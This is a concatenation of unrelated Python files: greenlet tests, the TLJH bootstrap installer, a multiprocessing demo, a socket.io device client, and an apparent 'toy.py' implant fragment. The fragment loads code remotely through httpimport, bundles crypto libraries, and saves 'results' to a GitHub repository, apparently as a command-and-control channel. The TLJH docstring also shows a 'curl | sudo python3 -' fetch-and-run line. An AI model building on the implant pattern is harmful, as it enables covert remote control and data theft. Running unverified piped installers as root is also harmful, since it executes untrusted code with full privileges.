def stop(self):
self.done = True
def main():
loadingAnimation = LoadingAnimation()
loadingAnimation.start()
sleep(2)
loadingAnimation.stop()
stdout.write('\rTemp \n')
if __name__ == '__main__':
main()
|
test_greenlet.py
|
import gc
import sys
import time
import threading
import unittest
from abc import ABCMeta, abstractmethod
from greenlet import greenlet
class SomeError(Exception):
pass
def fmain(seen):
try:
greenlet.getcurrent().parent.switch()
except:
seen.append(sys.exc_info()[0])
raise
raise SomeError
def send_exception(g, exc):
    # note: send_exception(g, exc) can now be done with g.throw(exc).
    # the purpose of this test is to explicitly check the propagation rules.
def crasher(exc):
raise exc
g1 = greenlet(crasher, parent=g)
g1.switch(exc)
class GreenletTests(unittest.TestCase):
def test_simple(self):
lst = []
def f():
lst.append(1)
greenlet.getcurrent().parent.switch()
lst.append(3)
g = greenlet(f)
lst.append(0)
g.switch()
lst.append(2)
g.switch()
lst.append(4)
self.assertEqual(lst, list(range(5)))
def test_parent_equals_None(self):
g = greenlet(parent=None)
self.assertIsNotNone(g)
self.assertIs(g.parent, greenlet.getcurrent())
def test_run_equals_None(self):
g = greenlet(run=None)
self.assertIsNotNone(g)
self.assertIsNone(g.run)
def test_two_children(self):
lst = []
def f():
lst.append(1)
greenlet.getcurrent().parent.switch()
lst.extend([1, 1])
g = greenlet(f)
h = greenlet(f)
g.switch()
self.assertEqual(len(lst), 1)
h.switch()
self.assertEqual(len(lst), 2)
h.switch()
self.assertEqual(len(lst), 4)
self.assertEqual(h.dead, True)
g.switch()
self.assertEqual(len(lst), 6)
self.assertEqual(g.dead, True)
def test_two_recursive_children(self):
lst = []
def f():
lst.append(1)
greenlet.getcurrent().parent.switch()
def g():
lst.append(1)
g = greenlet(f)
g.switch()
lst.append(1)
g = greenlet(g)
g.switch()
self.assertEqual(len(lst), 3)
self.assertEqual(sys.getrefcount(g), 2)
def test_threads(self):
success = []
def f():
self.test_simple()
success.append(True)
ths = [threading.Thread(target=f) for i in range(10)]
for th in ths:
th.start()
for th in ths:
th.join()
self.assertEqual(len(success), len(ths))
def test_exception(self):
seen = []
g1 = greenlet(fmain)
g2 = greenlet(fmain)
g1.switch(seen)
g2.switch(seen)
g2.parent = g1
self.assertEqual(seen, [])
self.assertRaises(SomeError, g2.switch)
self.assertEqual(seen, [SomeError])
g2.switch()
self.assertEqual(seen, [SomeError])
def test_send_exception(self):
seen = []
g1 = greenlet(fmain)
g1.switch(seen)
self.assertRaises(KeyError, send_exception, g1, KeyError)
self.assertEqual(seen, [KeyError])
def test_dealloc(self):
seen = []
g1 = greenlet(fmain)
g2 = greenlet(fmain)
g1.switch(seen)
g2.switch(seen)
self.assertEqual(seen, [])
del g1
gc.collect()
self.assertEqual(seen, [greenlet.GreenletExit])
del g2
gc.collect()
self.assertEqual(seen, [greenlet.GreenletExit, greenlet.GreenletExit])
def test_dealloc_other_thread(self):
seen = []
someref = []
lock = threading.Lock()
lock.acquire()
lock2 = threading.Lock()
lock2.acquire()
def f():
g1 = greenlet(fmain)
g1.switch(seen)
someref.append(g1)
del g1
gc.collect()
lock.release()
lock2.acquire()
greenlet() # trigger release
lock.release()
lock2.acquire()
t = threading.Thread(target=f)
t.start()
lock.acquire()
self.assertEqual(seen, [])
self.assertEqual(len(someref), 1)
del someref[:]
gc.collect()
# g1 is not released immediately because it's from another thread
self.assertEqual(seen, [])
lock2.release()
lock.acquire()
self.assertEqual(seen, [greenlet.GreenletExit])
lock2.release()
t.join()
def test_frame(self):
def f1():
f = sys._getframe(0) # pylint:disable=protected-access
self.assertEqual(f.f_back, None)
greenlet.getcurrent().parent.switch(f)
return "meaning of life"
g = greenlet(f1)
frame = g.switch()
self.assertTrue(frame is g.gr_frame)
self.assertTrue(g)
from_g = g.switch()
self.assertFalse(g)
self.assertEqual(from_g, 'meaning of life')
self.assertEqual(g.gr_frame, None)
def test_thread_bug(self):
def runner(x):
g = greenlet(lambda: time.sleep(x))
g.switch()
t1 = threading.Thread(target=runner, args=(0.2,))
t2 = threading.Thread(target=runner, args=(0.3,))
t1.start()
t2.start()
t1.join()
t2.join()
def test_switch_kwargs(self):
def run(a, b):
self.assertEqual(a, 4)
self.assertEqual(b, 2)
return 42
x = greenlet(run).switch(a=4, b=2)
self.assertEqual(x, 42)
def test_switch_kwargs_to_parent(self):
def run(x):
greenlet.getcurrent().parent.switch(x=x)
greenlet.getcurrent().parent.switch(2, x=3)
return x, x ** 2
g = greenlet(run)
self.assertEqual({'x': 3}, g.switch(3))
self.assertEqual(((2,), {'x': 3}), g.switch())
self.assertEqual((3, 9), g.switch())
def test_switch_to_another_thread(self):
data = {}
error = None
created_event = threading.Event()
done_event = threading.Event()
def run():
data['g'] = greenlet(lambda: None)
created_event.set()
done_event.wait()
thread = threading.Thread(target=run)
thread.start()
created_event.wait()
try:
data['g'].switch()
except greenlet.error:
error = sys.exc_info()[1]
self.assertIsNotNone(error, "greenlet.error was not raised!")
done_event.set()
thread.join()
def test_exc_state(self):
def f():
try:
raise ValueError('fun')
except: # pylint:disable=bare-except
exc_info = sys.exc_info()
greenlet(h).switch()
self.assertEqual(exc_info, sys.exc_info())
def h():
self.assertEqual(sys.exc_info(), (None, None, None))
greenlet(f).switch()
def test_instance_dict(self):
def f():
greenlet.getcurrent().test = 42
def deldict(g):
del g.__dict__
def setdict(g, value):
g.__dict__ = value
g = greenlet(f)
self.assertEqual(g.__dict__, {})
g.switch()
self.assertEqual(g.test, 42)
self.assertEqual(g.__dict__, {'test': 42})
g.__dict__ = g.__dict__
self.assertEqual(g.__dict__, {'test': 42})
self.assertRaises(TypeError, deldict, g)
self.assertRaises(TypeError, setdict, g, 42)
def test_threaded_reparent(self):
data = {}
created_event = threading.Event()
done_event = threading.Event()
def run():
data['g'] = greenlet(lambda: None)
created_event.set()
done_event.wait()
def blank():
greenlet.getcurrent().parent.switch()
def setparent(g, value):
g.parent = value
thread = threading.Thread(target=run)
thread.start()
created_event.wait()
g = greenlet(blank)
g.switch()
self.assertRaises(ValueError, setparent, g, data['g'])
done_event.set()
thread.join()
def test_deepcopy(self):
import copy
self.assertRaises(TypeError, copy.copy, greenlet())
self.assertRaises(TypeError, copy.deepcopy, greenlet())
def test_parent_restored_on_kill(self):
hub = greenlet(lambda: None)
main = greenlet.getcurrent()
result = []
def worker():
try:
# Wait to be killed
main.switch()
except greenlet.GreenletExit:
# Resurrect and switch to parent
result.append(greenlet.getcurrent().parent)
result.append(greenlet.getcurrent())
hub.switch()
g = greenlet(worker, parent=hub)
g.switch()
del g
self.assertTrue(result)
self.assertEqual(result[0], main)
self.assertEqual(result[1].parent, hub)
def test_parent_return_failure(self):
# No run causes AttributeError on switch
g1 = greenlet()
# Greenlet that implicitly switches to parent
g2 = greenlet(lambda: None, parent=g1)
# AttributeError should propagate to us, no fatal errors
self.assertRaises(AttributeError, g2.switch)
def test_throw_exception_not_lost(self):
class mygreenlet(greenlet):
def __getattribute__(self, name):
try:
raise Exception()
except: # pylint:disable=bare-except
pass
return greenlet.__getattribute__(self, name)
g = mygreenlet(lambda: None)
self.assertRaises(SomeError, g.throw, SomeError())
def test_throw_doesnt_crash(self):
result = []
def worker():
greenlet.getcurrent().parent.switch()
def creator():
g = greenlet(worker)
g.switch()
result.append(g)
t = threading.Thread(target=creator)
t.start()
t.join()
self.assertRaises(greenlet.error, result[0].throw, SomeError())
def test_recursive_startup(self):
class convoluted(greenlet):
def __init__(self):
greenlet.__init__(self)
self.count = 0
def __getattribute__(self, name):
if name == 'run' and self.count == 0:
self.count = 1
self.switch(43)
return greenlet.__getattribute__(self, name)
def run(self, value):
while True:
self.parent.switch(value)
g = convoluted()
self.assertEqual(g.switch(42), 43)
def test_unexpected_reparenting(self):
another = []
def worker():
g = greenlet(lambda: None)
another.append(g)
g.switch()
t = threading.Thread(target=worker)
t.start()
t.join()
class convoluted(greenlet):
def __getattribute__(self, name):
if name == 'run':
self.parent = another[0] # pylint:disable=attribute-defined-outside-init
return greenlet.__getattribute__(self, name)
g = convoluted(lambda: None)
self.assertRaises(greenlet.error, g.switch)
def test_threaded_updatecurrent(self):
# released when main thread should execute
lock1 = threading.Lock()
lock1.acquire()
# released when another thread should execute
lock2 = threading.Lock()
lock2.acquire()
class finalized(object):
def __del__(self):
# happens while in green_updatecurrent() in main greenlet
# should be very careful not to accidentally call it again
# at the same time we must make sure another thread executes
lock2.release()
lock1.acquire()
# now ts_current belongs to another thread
def deallocator():
greenlet.getcurrent().parent.switch()
def fthread():
lock2.acquire()
greenlet.getcurrent()
del g[0]
lock1.release()
lock2.acquire()
greenlet.getcurrent()
lock1.release()
main = greenlet.getcurrent()
g = [greenlet(deallocator)]
g[0].bomb = finalized()
g[0].switch()
t = threading.Thread(target=fthread)
t.start()
# let another thread grab ts_current and deallocate g[0]
lock2.release()
lock1.acquire()
# this is the corner stone
# getcurrent() will notice that ts_current belongs to another thread
# and start the update process, which would notice that g[0] should
# be deallocated, and that will execute an object's finalizer. Now,
# that object will let another thread run so it can grab ts_current
# again, which would likely crash the interpreter if there's no
# check for this case at the end of green_updatecurrent(). This test
# passes if getcurrent() returns correct result, but it's likely
# to randomly crash if it's not anyway.
self.assertEqual(greenlet.getcurrent(), main)
# wait for another thread to complete, just in case
t.join()
def test_dealloc_switch_args_not_lost(self):
seen = []
def worker():
# wait for the value
value = greenlet.getcurrent().parent.switch()
# delete all references to ourself
del worker[0]
initiator.parent = greenlet.getcurrent().parent
# switch to main with the value, but because
# ts_current is the last reference to us we
# return immediately
try:
greenlet.getcurrent().parent.switch(value)
finally:
seen.append(greenlet.getcurrent())
def initiator():
return 42 # implicitly falls thru to parent
worker = [greenlet(worker)]
worker[0].switch() # prime worker
initiator = greenlet(initiator, worker[0])
value = initiator.switch()
self.assertTrue(seen)
self.assertEqual(value, 42)
def test_tuple_subclass(self):
if sys.version_info[0] > 2:
# There's no apply in Python 3.x
def _apply(func, a, k):
func(*a, **k)
else:
_apply = apply # pylint:disable=undefined-variable
class mytuple(tuple):
def __len__(self):
greenlet.getcurrent().switch()
return tuple.__len__(self)
args = mytuple()
kwargs = dict(a=42)
def switchapply():
_apply(greenlet.getcurrent().parent.switch, args, kwargs)
g = greenlet(switchapply)
self.assertEqual(g.switch(), kwargs)
def test_abstract_subclasses(self):
AbstractSubclass = ABCMeta(
'AbstractSubclass',
(greenlet,),
{'run': abstractmethod(lambda self: None)})
class BadSubclass(AbstractSubclass):
pass
class GoodSubclass(AbstractSubclass):
def run(self):
pass
GoodSubclass() # should not raise
self.assertRaises(TypeError, BadSubclass)
def test_implicit_parent_with_threads(self):
if not gc.isenabled():
return # cannot test with disabled gc
N = gc.get_threshold()[0]
if N < 50:
return # cannot test with such a small N
def attempt():
lock1 = threading.Lock()
lock1.acquire()
lock2 = threading.Lock()
lock2.acquire()
recycled = [False]
def another_thread():
lock1.acquire() # wait for gc
greenlet.getcurrent() # update ts_current
lock2.release() # release gc
t = threading.Thread(target=another_thread)
t.start()
class gc_callback(object):
def __del__(self):
lock1.release()
lock2.acquire()
recycled[0] = True
class garbage(object):
def __init__(self):
self.cycle = self
self.callback = gc_callback()
l = []
x = range(N*2)
current = greenlet.getcurrent()
g = garbage()
for _ in x:
g = None # lose reference to garbage
if recycled[0]:
# gc callback called prematurely
t.join()
return False
last = greenlet()
if recycled[0]:
break # yes! gc called in green_new
l.append(last) # increase allocation counter
else:
# gc callback not called when expected
gc.collect()
if recycled[0]:
t.join()
return False
self.assertEqual(last.parent, current)
for g in l:
self.assertEqual(g.parent, current)
return True
for _ in range(5):
if attempt():
break
class TestRepr(unittest.TestCase):
def assertEndsWith(self, got, suffix):
self.assertTrue(got.endswith(suffix), (got, suffix))
def test_main_while_running(self):
r = repr(greenlet.getcurrent())
self.assertEndsWith(r, " current active started main>")
def test_main_in_background(self):
main = greenlet.getcurrent()
def run():
return repr(main)
g = greenlet(run)
r = g.switch()
self.assertEndsWith(r, ' suspended active started main>')
def test_initial(self):
r = repr(greenlet())
self.assertEndsWith(r, ' pending>')
def test_main_from_other_thread(self):
main = greenlet.getcurrent()
class T(threading.Thread):
original_main = thread_main = None
main_glet = None
def run(self):
self.original_main = repr(main)
self.main_glet = greenlet.getcurrent()
self.thread_main = repr(self.main_glet)
t = T()
t.start()
t.join(10)
self.assertEndsWith(t.original_main, ' suspended active started main>')
self.assertEndsWith(t.thread_main, ' current active started main>')
r = repr(t.main_glet)
# main greenlets, even from dead threads, never really appear dead
# TODO: Can we find a better way to differentiate that?
assert not t.main_glet.dead
self.assertEndsWith(r, ' suspended active started main>')
def test_dead(self):
g = greenlet(lambda: None)
g.switch()
self.assertEndsWith(repr(g), ' dead>')
self.assertNotIn('suspended', repr(g))
self.assertNotIn('started', repr(g))
self.assertNotIn('active', repr(g))
def test_formatting_produces_native_str(self):
# https://github.com/python-greenlet/greenlet/issues/218
# %s formatting on Python 2 was producing unicode, not str.
g_dead = greenlet(lambda: None)
g_not_started = greenlet(lambda: None)
g_cur = greenlet.getcurrent()
for g in g_dead, g_not_started, g_cur:
self.assertIsInstance(
'%s' % (g,),
str
)
self.assertIsInstance(
'%r' % (g,),
str,
)
if __name__ == '__main__':
unittest.main()
|
bootstrap.py
|
"""
Bootstrap an installation of TLJH.
Sets up just enough TLJH environments to invoke tljh.installer.
This script is run as:
curl <script-url> | sudo python3 -
Constraints:
- The entire script should be compatible with Python 3.6, which is the default
  Python 3 version on Ubuntu 18.04+.
- The script should still parse in Python 3.5, since we print an error message
  for users on Ubuntu 16.04, which ships Python 3.5 by default. This means no
  f-strings can be used.
- The script must depend only on stdlib modules, as no previous installation
of dependencies can be assumed.
Environment variables:
TLJH_INSTALL_PREFIX Defaults to "/opt/tljh", determines the location
of the tljh installations root folder.
TLJH_BOOTSTRAP_PIP_SPEC From this location, the bootstrap script will
pip install --upgrade the tljh installer.
TLJH_BOOTSTRAP_DEV Determines if --editable is passed when
installing the tljh installer. Pass the values
yes or no.
Command line flags:
The bootstrap.py script accept the following command line flags. All other
flags are passed through to the tljh installer without interception by this
script.
--show-progress-page Starts a local web server listening on port 80 where
logs can be accessed during installation. If this is
passed, it will pass --progress-page-server-pid=<pid>
to the tljh installer for later termination.
"""
import os
from http.server import SimpleHTTPRequestHandler, HTTPServer
import multiprocessing
import subprocess
import sys
import logging
import shutil
import urllib.request
progress_page_favicon_url = "https://raw.githubusercontent.com/jupyterhub/jupyterhub/HEAD/share/jupyterhub/static/favicon.ico"
progress_page_html = """
<html>
<head>
<title>The Littlest Jupyterhub</title>
</head>
<body>
<meta http-equiv="refresh" content="30" >
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width">
<img class="logo" src="https://raw.githubusercontent.com/jupyterhub/the-littlest-jupyterhub/HEAD/docs/images/logo/logo.png">
<div class="loader center"></div>
<div class="center main-msg">Please wait while your TLJH is setting up...</div>
<div class="center logs-msg">Click the button below to see the logs</div>
<div class="center tip" >Tip: to update the logs, refresh the page</div>
<button class="logs-button center" onclick="window.location.href='/logs'">View logs</button>
</body>
<style>
button:hover {
background: grey;
}
.logo {
width: 150px;
height: auto;
}
.center {
margin: 0 auto;
margin-top: 50px;
text-align:center;
display: block;
}
.main-msg {
font-size: 30px;
font-weight: bold;
color: grey;
text-align:center;
}
.logs-msg {
font-size: 15px;
color: grey;
}
.tip {
font-size: 13px;
color: grey;
margin-top: 10px;
font-style: italic;
}
.logs-button {
margin-top:15px;
border: 0;
color: white;
padding: 15px 32px;
font-size: 16px;
cursor: pointer;
background: #f5a252;
}
.loader {
width: 150px;
height: 150px;
border-radius: 90%;
border: 7px solid transparent;
animation: spin 2s infinite ease;
animation-direction: alternate;
}
@keyframes spin {
0% {
transform: rotateZ(0deg);
border-top-color: #f17c0e
}
100% {
transform: rotateZ(360deg);
border-top-color: #fce5cf;
}
}
</style>
</html>
"""
logger = logging.getLogger(__name__)
# This function is needed both by the process starting this script, and by the
# TLJH installer that this script execs in the end. Make sure its replica at
# tljh/utils.py stays in sync with this version!
def run_subprocess(cmd, *args, **kwargs):
"""
Run given cmd with smart output behavior.
If command succeeds, print output to debug logging.
If it fails, print output to info logging.
In TLJH, this sends successful output to the installer log,
and failed output directly to the user's screen
"""
logger = logging.getLogger('tljh')
proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, *args, **kwargs)
printable_command = ' '.join(cmd)
if proc.returncode != 0:
# Our process failed! Show output to the user
logger.error('Ran {command} with exit code {code}'.format(
command=printable_command, code=proc.returncode
))
logger.error(proc.stdout.decode())
raise subprocess.CalledProcessError(cmd=cmd, returncode=proc.returncode)
else:
# This goes into installer.log
logger.debug('Ran {command} with exit code {code}'.format(
command=printable_command, code=proc.returncode
))
# This produces multi line log output, unfortunately. Not sure how to fix.
# For now, prioritizing human readability over machine readability.
logger.debug(proc.stdout.decode())
def ensure_host_system_can_install_tljh():
"""
Check if TLJH is installable in current host system and exit with a clear
error message otherwise.
"""
def get_os_release_variable(key):
"""
Return value for key from /etc/os-release
/etc/os-release is a bash file, so should use bash to parse it.
Returns empty string if key is not found.
"""
return subprocess.check_output([
'/bin/bash', '-c',
"source /etc/os-release && echo ${{{key}}}".format(key=key)
]).decode().strip()
# Require Ubuntu 18.04+
distro = get_os_release_variable('ID')
version = float(get_os_release_variable('VERSION_ID'))
if distro != 'ubuntu':
print('The Littlest JupyterHub currently supports Ubuntu Linux only')
sys.exit(1)
elif float(version) < 18.04:
print('The Littlest JupyterHub requires Ubuntu 18.04 or higher')
sys.exit(1)
# Require Python 3.6+
if sys.version_info < (3, 6):
print("bootstrap.py must be run with at least Python 3.6")
sys.exit(1)
# Require systemd (systemctl is a part of systemd)
if not shutil.which('systemd') or not shutil.which('systemctl'):
print("Systemd is required to run TLJH")
# Provide additional information about running in docker containers
if os.path.exists('/.dockerenv'):
print("Running inside a docker container without systemd isn't supported")
print("We recommend against running a production TLJH instance inside a docker container")
print("For local development, see http://tljh.jupyter.org/en/latest/contributing/dev-setup.html")
sys.exit(1)
class ProgressPageRequestHandler(SimpleHTTPRequestHandler):
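    # Minimal request routing for the temporary progress page:
    #   /logs         -> returns the contents of /opt/tljh/installer.log as plain text
    #   /index.html   -> served from /var/run/index.html (written by main())
    #   /favicon.ico  -> served from /var/run/favicon.ico
    #   /             -> 302 redirect to /index.html
    #   anything else -> 403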
def do_GET(self):
if self.path == "/logs":
with open("/opt/tljh/installer.log", "r") as log_file:
logs = log_file.read()
self.send_response(200)
self.send_header('Content-Type', 'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write(logs.encode('utf-8'))
elif self.path == "/index.html":
self.path = "/var/run/index.html"
return SimpleHTTPRequestHandler.do_GET(self)
elif self.path == "/favicon.ico":
self.path = "/var/run/favicon.ico"
return SimpleHTTPRequestHandler.do_GET(self)
elif self.path == "/":
self.send_response(302)
self.send_header('Location','/index.html')
self.end_headers()
else:
SimpleHTTPRequestHandler.send_error(self, code=403)
def main():
"""
This script intercepts the --show-progress-page flag, but all other flags
are passed through to the TLJH installer script.
The --show-progress-page flag indicates that the bootstrap script should
start a local webserver temporarily and report its installation progress via
a web site served locally on port 80.
"""
ensure_host_system_can_install_tljh()
# Various related constants
install_prefix = os.environ.get('TLJH_INSTALL_PREFIX', '/opt/tljh')
hub_prefix = os.path.join(install_prefix, 'hub')
python_bin = os.path.join(hub_prefix, 'bin', 'python3')
pip_bin = os.path.join(hub_prefix, 'bin', 'pip')
initial_setup = not os.path.exists(python_bin)
# Attempt to start a web server to serve a progress page reporting
# installation progress.
tljh_installer_flags = sys.argv[1:]
if "--show-progress-page" in tljh_installer_flags:
# Remove the bootstrap specific flag and let all other flags pass
# through to the installer.
tljh_installer_flags.remove("--show-progress-page")
# Write HTML and a favicon to be served by our webserver
with open("/var/run/index.html", "w+") as f:
f.write(progress_page_html)
urllib.request.urlretrieve(progress_page_favicon_url, "/var/run/favicon.ico")
# If TLJH is already installed and Traefik is already running, port 80
# will be busy and we will get an "Address already in use" error. This
# is acceptable and we can ignore the error.
try:
# Serve the loading page until manually aborted or until the TLJH
# installer terminates the process
def serve_forever(server):
try:
server.serve_forever()
except KeyboardInterrupt:
pass
progress_page_server = HTTPServer(("", 80), ProgressPageRequestHandler)
p = multiprocessing.Process(target=serve_forever, args=(progress_page_server,))
p.start()
# Pass the server's pid to the installer for later termination
tljh_installer_flags.extend(["--progress-page-server-pid", str(p.pid)])
except OSError:
pass
# Set up logging to print to a file and to stderr
os.makedirs(install_prefix, exist_ok=True)
file_logger_path = os.path.join(install_prefix, 'installer.log')
file_logger = logging.FileHandler(file_logger_path)
# installer.log should be readable only by root
os.chmod(file_logger_path, 0o500)
file_logger.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
file_logger.setLevel(logging.DEBUG)
logger.addHandler(file_logger)
stderr_logger = logging.StreamHandler()
stderr_logger.setFormatter(logging.Formatter('%(message)s'))
stderr_logger.setLevel(logging.INFO)
logger.addHandler(stderr_logger)
logger.setLevel(logging.DEBUG)
if not initial_setup:
logger.info('Existing TLJH installation detected, upgrading...')
else:
logger.info('Existing TLJH installation not detected, installing...')
logger.info('Setting up hub environment...')
logger.info('Installing Python, venv, pip, and git via apt-get...')
# In some very minimal base VM images, it looks like the "universe" apt
# package repository is disabled by default, causing bootstrapping to
# fail. We install the software-properties-common package so we can get
# the add-apt-repository command to make sure the universe repository is
# enabled, since that's where the python3-pip package lives.
#
# In Ubuntu 21.10 DEBIAN_FRONTEND has found to be needed to avoid
# getting stuck on an input prompt during apt-get install.
#
apt_get_adjusted_env = os.environ.copy()
apt_get_adjusted_env["DEBIAN_FRONTEND"] = "noninteractive"
run_subprocess(['apt-get', 'update'])
run_subprocess(['apt-get', 'install', '--yes', 'software-properties-common'], env=apt_get_adjusted_env)
run_subprocess(['add-apt-repository', 'universe', '--yes'])
run_subprocess(['apt-get', 'update'])
run_subprocess(['apt-get', 'install', '--yes', 'python3', 'python3-venv', 'python3-pip', 'git'], env=apt_get_adjusted_env)
logger.info('Setting up virtual environment at {}'.format(hub_prefix))
os.makedirs(hub_prefix, exist_ok=True)
run_subprocess(['python3', '-m', 'venv', hub_prefix])
# Upgrade pip
# Keep pip version pinning in sync with the one in unit-test.yml!
# See changelog at https://pip.pypa.io/en/latest/news/#changelog
logger.info('Upgrading pip...')
run_subprocess([pip_bin, 'install', '--upgrade', 'pip==21.3.*'])
# Install/upgrade TLJH installer
tljh_install_cmd = [pip_bin, 'install', '--upgrade']
if os.environ.get('TLJH_BOOTSTRAP_DEV', 'no') == 'yes':
tljh_install_cmd.append('--editable')
tljh_install_cmd.append(
os.environ.get(
'TLJH_BOOTSTRAP_PIP_SPEC',
'git+https://github.com/jupyterhub/the-littlest-jupyterhub.git'
)
)
if initial_setup:
logger.info('Installing TLJH installer...')
else:
logger.info('Upgrading TLJH installer...')
run_subprocess(tljh_install_cmd)
# Run TLJH installer
logger.info('Running TLJH installer...')
os.execv(python_bin, [python_bin, '-m', 'tljh.installer'] + tljh_installer_flags)
if __name__ == '__main__':
main()
|
thread.py
|
from multiprocessing import Process, Queue, Pool
import os
import time
import random
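# Despite the file name, this is a multiprocessing demo: run(num) spawns `num`
# reader processes that drain a shared Queue of random sleep times. Note that the
# q.empty()/q.get() pair in read() is not atomic, so with several readers a
# process can observe a non-empty queue and still block in get() if another
# process takes the last item first; acceptable for a demo, but worth knowing.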
# def queue_demo(func):
# def wrapper(*args, **kwargs):
# print(f'fetch task from queue: {os.getpid()}')
# func(*args, **kwargs)
# return wrapper
# @queue_demo
def read(q):
while True:
if q.empty():
return
else:
t = q.get()
print(f'get {t} from queue, process ID < {os.getpid()} >')
time.sleep(t / 10)
def run(num):
start = time.time()
queue_list = [random.randint(1, 4) for _ in range(100)]
queue = Queue()
for _ in queue_list:
queue.put(_)
processes = []
for _ in range(num):
processes.append(
Process(target=read, args=(queue, ))
)
for process in processes:
process.start()
for process in processes:
process.join()
end = time.time()
print(f'done. {round(end - start, 4)} seconds used.')
if __name__ == '__main__':
# run(1)
# run(2)
# run(4)
run(4)
|
vhSockets.py
|
# Websocket handler
from socketIO_client_nexus import SocketIO, LoggingNamespace
import threading, json, math
class vhSockets:
devices = []
connected = False
win = False
socketIO = None
#bindable events
onConnection = None # bool connected
def init(self, win):
self.win = win
print("Connecting to", win.server, LoggingNamespace)
socketIO = SocketIO(win.server, 80)
socketIO.on('connect', self.on_connect)
socketIO.on('disconnect', self.on_disconnect)
socketIO.on('reconnect', self.on_connect)
socketIO.on('dev_online', self.on_device_connected)
self.socketIO = socketIO
thrd = threading.Thread(target=socketIO.wait)
thrd.daemon = True
thrd.start()
#sends numbers to the socket
def sendP( self, colorBuffer ):
self.socketIO.emit('p', colorBuffer.hex())
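    # Builds and emits a vibration "program" for the connected device: an immediate
    # intensity stage followed by a timed easing stage; for durations of 1.2 s or
    # more it first inserts repeated 200 ms drop-to-zero "bounce" stages. (This
    # describes the payload constructed below; the server-side semantics belong to
    # the device hub and are not defined in this file.)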
def sendProgram( self, intensity, duration ):
easing = "Quintic.In"
stages = [
{"i":intensity},
{"d":round(duration*1000), "e":easing}
]
if duration >= 1.2:
numBounces = math.floor((duration-1)/0.2)
stages = [
{"i":intensity},
{"d":200, "i":0, "e":"Quintic.In", "r":numBounces},
{"i":intensity},
{"d":round((duration-numBounces*0.2)*1000), "e":easing}
]
program = {
"id" : self.win.deviceID,
"type" : "vib",
"data" : {
"stages" : stages
}
}
self.socketIO.emit('GET', program)
def getDeviceByName(self, name):
for i in range(0, len(self.devices)):
if self.devices[i] == name:
return i
return -1
def on_connect(self):
self.connected = True
win = self.win
print('<<WS Evt>> We have connection, sending app name:', win.appName)
self.socketIO.emit('app', win.appName, self.on_name)
if self.onConnection:
self.onConnection(True)
def on_disconnect(self):
self.connected = False
if self.onConnection:
self.onConnection(False)
print('<<WS Evt>> on_disconnect')
def on_hookup(*args):
self = args[0]
self.devices = args[1]
print("<<WS Evt>> New devices", self.devices)
def on_name(*args):
self = args[0]
print('<<WS Evt>> App name accepted, hooking up our device')
self.setDeviceId()
def resetDevice(self):
self.socketIO.emit('hookdown', [], self.setDeviceId)
def on_device_connected(*args):
print('Device connected, resetting it')
self = args[0]
self.resetVib()
def resetVib(self):
self.sendP(bytes([0,0,0,0,0]))
def setDeviceId(*args):
self = args[0]
self.socketIO.emit('hookup', self.win.deviceID, self.on_hookup)
|
toy.py
|
# -*- encoding: utf-8 -*-
import sys
import getpass
import json
import platform
import random
import socket
import string
import time
import threading
import logging
import Queue
try:
from urllib2 import urlopen, Request
except ImportError:
from urllib.request import urlopen, Request
from commander.thirdparty.httpimport import add_remote_repo, remove_remote_repo
from commander.thirdparty.httpimport import remote_repo, github_repo
try:
import Crypto
except ImportError:
    if platform.system() == 'Linux':
from toy.lib.lnx.Crypto import Random
from toy.lib.lnx.Crypto.PublicKey import RSA
from toy.lib.lnx.Crypto.Cipher import AES, PKCS1_OAEP
    elif platform.system() == 'Windows':
from toy.lib.win.Crypto import Random
from toy.lib.win.Crypto.PublicKey import RSA
from toy.lib.win.Crypto.Cipher import AES, PKCS1_OAEP
# fmt = '%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s'
fmt = '[%(asctime)s] [%(levelname)s] [ %(filename)s:%(lineno)s ] %(message)s '
logging.basicConfig(level=logging.INFO, format=fmt)
class GitHubAPI(object):
def __init__(self, guser=None, gpwd=None, gtoken=None,
grepo=None, gbranch='master'):
if not gtoken and not gpwd:
            raise ValueError('Either a token or a password must be provided')
self.owner = guser
self.gpwd = gpwd
self.token = gtoken
self.repo = grepo
self.branch = gbranch
@staticmethod
def _request(method='GET', uri=None, data=None, headers=None, timeout=30):
url = 'https://api.github.com'
url = uri if url in uri else (url + uri)
        req = Request(url)  # Request() does not accept a timeout; it is passed to urlopen() below
req.headers = {'User-Agent': 'App',
'Accept': 'application/vnd.github.v3+json'}
if headers:
req.headers.update(headers)
req.get_method = lambda: method
if data:
data = json.dumps(data, ensure_ascii=False)
try:
logging.info('Start to request: %s' % url)
logging.debug('Request data: %s' % data)
            rsp = urlopen(req, data, timeout=timeout)
except Exception as e:
logging.error('[-] Request error: %s' % url)
logging.exception(e)
rsp = None
return rsp
def request(self, method='GET', uri=None, data=None, headers=None):
headers = headers or {}
if self.token:
headers.update({'Authorization': 'token ' + self.token})
else:
up = ':'.join((self.owner, self.gpwd))
auth_hash = up.encode('base64').strip()
headers.update({'Authorization': 'Basic ' + auth_hash})
return GitHubAPI._request(method=method, uri=uri,
data=data, headers=headers)
def put(self, path, content, msg='new file'):
"""
PUT /repos/:owner/:repo/contents/:path
"""
uri = '/repos/%s/%s/contents/%s' % (self.owner, self.repo, path)
data = {'message': msg, 'content': content.encode('base64')}
logging.info('[*] Save result to %s' % path)
return self.request('PUT', uri, data)
def get(self, path):
"""
GET /repos/:owner/:repo/contents/:path
"""
uri = '/repos/%s/%s/contents/%s' % (self.owner, self.repo, path)
rsp = self.request(uri=uri)
content = json.loads(rsp.read().strip()) if rsp else {}
# return content.get('content', '').decode('base64'), content
return content
def update(self, path, content, sha, msg='update file'):
"""
PUT /repos/:owner/:repo/contents/:path
"""
uri = '/repos/%s/%s/contents/%s' % (self.owner, self.repo, path)
data = {'message': msg,
'content': content.encode('base64'),
'sha': sha}
return self.request('PUT', uri, data)
def delete(self, path, sha, msg='delete file'):
"""
DELETE /repos/:owner/:repo/contents/:path
"""
uri = '/repos/%s/%s/contents/%s' % (self.owner, self.repo, path)
data = {'message': msg, 'sha': sha}
return self.request('DELETE', uri, data)
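# Illustrative use of GitHubAPI (a sketch; owner/repo/token/path values below are
# placeholders, not values from this file):
#   gh = GitHubAPI(guser='owner', gtoken='<token>', grepo='repo')
#   gh.put('results/output.txt', 'hello', msg='new file')
#   meta = gh.get('results/output.txt')
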